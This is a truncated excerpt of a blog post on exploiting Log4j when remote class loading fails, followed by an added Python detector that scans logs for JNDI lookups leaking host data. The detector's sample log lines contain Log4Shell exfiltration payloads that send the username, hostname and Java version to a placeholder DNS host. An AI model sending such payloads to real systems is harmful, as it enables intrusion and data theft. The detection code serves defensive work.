Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)


So you might have heard of the Log4j vulnerability (lol). If you’ve read the initial proofs of concept and general information that rushed out at first, in most cases it all points you in the same direction…

Data exfiltration via DNS lookups: most of the time this means sending a JNDI request that resolves an environment variable before placing it in the “subdomain” position of a URL where DNS lookups are being watched. The main three things that I got out of this were hostname, username, and Java version. This…
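For defenders, the pattern described above can be hunted for in request logs. The following is an added example, not code from the original article: it finds JNDI lookups whose host part embeds a nested lookup (environment variable, system property, Java info, hostname) and reports what would be leaked. The function names, log lines and `example.test` hostnames are constructed for illustration.

```python
import re

# Nested lookup prefixes that expose host details when resolved inside a JNDI URL.
LEAKY = ("env:", "sys:", "java:", "hostName")

def balanced(text, start):
    """Return the ${...} expression beginning at text[start], honoring nested braces."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return None  # unterminated expression: ignore it

def find_exfil(line):
    """Return [(jndi_expression, [leaky nested lookups in the host part])] for one log line."""
    hits = []
    for m in re.finditer(r"\$\{jndi:", line, re.IGNORECASE):
        expr = balanced(line, m.start())
        if expr is None:
            continue
        body = expr[len("${jndi:"):-1]
        # Host part of the URL: this is the "subdomain" position that ends up in a DNS query.
        authority = body.split("//", 1)[-1].split("/", 1)[0]
        nested = re.findall(r"\$\{([^${}]+)\}", authority)
        hits.append((expr, [n for n in nested if n.startswith(LEAKY)]))
    return hits

def scan(lines):
    """Return (line_number, expression, leaked_lookups) for every JNDI lookup found."""
    return [(n, e, l) for n, line in enumerate(lines, 1) for e, l in find_exfil(line)]

# Constructed sample log lines (not taken from the article).
SAMPLE_LOG = [
    '203.0.113.7 "GET / HTTP/1.1" 200 "-" "${jndi:ldap://${env:USER}.${hostName}.dns.example.test/a}"',
    '203.0.113.7 "GET /?q=${jndi:dns://${java:version}.dns.example.test} HTTP/1.1" 404',
    '198.51.100.2 "GET /health HTTP/1.1" 200 "-" "curl/8.0"',
    '198.51.100.9 "GET / HTTP/1.1" 200 "-" "${jndi:ldap://collector.example.test/a}"',
]

if __name__ == "__main__":
    for lineno, expr, leaked in scan(SAMPLE_LOG):
        print(lineno, "EXFIL" if leaked else "JNDI", leaked, expr)
```

A hit with a non-empty leaked list means the request tried to move host data into a DNS name; correlating the source address with resolver logs for the same domain shows whether the lookup actually fired.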